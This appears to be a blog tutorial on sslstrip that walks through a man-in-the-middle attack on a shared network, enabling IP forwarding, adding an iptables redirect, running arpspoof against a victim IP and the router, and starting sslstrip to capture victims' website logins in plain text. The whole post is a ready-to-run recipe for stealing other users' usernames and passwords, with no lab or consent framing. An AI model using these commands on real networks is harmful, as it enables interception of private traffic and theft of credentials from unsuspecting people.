What us Sslstrip
Sslstrip is a Middle Attack tool. It is used to capture the username and password from secure protocol [HTTPS]. Sslstrip allows attackers to convert HTTPS traffic into HTTP.HTTPS and HTTPS are the protocols that browser uses to communicate with websites.The only difference between HTTP and HTTPS is that HTTPS is secured it uses encryption so any information sent over HTTPS can not be read if it's captured.So Sslstrip manipulates the internet traffic and converts HTTPS traffic into HTTP in this way we can steal credentials[Username and Password] and read them in plain text.
How does sslstrip work
I am assuming that attacker have already started sslstrip and arpsoof.For now forget about arpsoof we will cover this later in the tutorial.
Step 1 :
First thing that will happen victim will open his web browser and attempts to open website via HTTPS connection. With the help of arpspoof router will forward that request to attacker.
Step 2 :
Once router forwards the request to attacker then attacker will cycle through Sslstrip and converts the HTTPS to HTTP. After recycling the request to Sslstrip attacker sends that request back to the router.
Step 3 :
Then attacker will send that request back to the router then attacker will send request to website.When website will respond and victim is going to connect via http.This is the step 1 we have forced victim to connect via http.
Now when victim logins to any website like facebook or yahoo and press login button then their username and password will be sent to the Router and arpsoof will forward that information to attacker and attacker will cycle through Sslstrip which will Log that information and again will send it to the website and website will process the login information.
Now that we have basic understanding how sslstrip works we are ready to do it practically.
first thing you need is to connect to the same network as victim.And open your terminal.Make note of your neetwork interface.If you are connected with internet via wifi then it should be wlan0 if wired or ethernet then eth0.
Enable Ip forwarding
Now we need to enable the ip forwarding so our computer can route traffic.So type the following command in your terminal.
root@seven:~# echo 1 > /proc/sys/net/ipv4/ip_forward
Now we have to configure Iptables to redirect the traffic.For a webserver default port number is assigned 80.for experiments 8080 is an alternative for port 80 so we will redirect traffic to 8080 port. Type or copy the following command in your terminal and hit enter.
root@seven:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Find gateway ip address
gateway address also known as the Router's address.We need find the Router's address that we are connected to.So type the following command and make note of your gateway address.
root@seven:~# route -n Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 0.0.0.0 192.168.150.2 0.0.0.0 UG 1024 0 0 eth0 192.168.150.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
Once you have your target we are ready to move forward.
Now we need start arpsoof to redirect the http traffic to our computer.type the following command in your terminal.Make note of interface i am connected with internet via ethernet so my interface is eth0 if you are connected via wifi then enter wlan0.
root@seven:~# arpspoof -i eth0 -t 192.168.150.128 -r 192.168.150.2
Arpspoof needs 3 arguments network interface,router's address and victim's ip address.
-i is for interface , -t is for target[victim's Ip Address] and -r is for your router's address.
Open another terminal we need to start start sslstrip.
root@seven:~# sslstrip -l 8080
Once you have started sslstrip now when your victim login to facebook ,yahoo or any other website to login. Then we will receive username and password in log file.Username and password will not be displayed in terminal so you need to open sslstrip.log file.
open sslstrip.log file
Username and password will be stored inside sslstrip.log file in home directory.So navigate to your home directory and check sslstrip.log file. Type the following command.
root@seven:~# cat sslstrip.log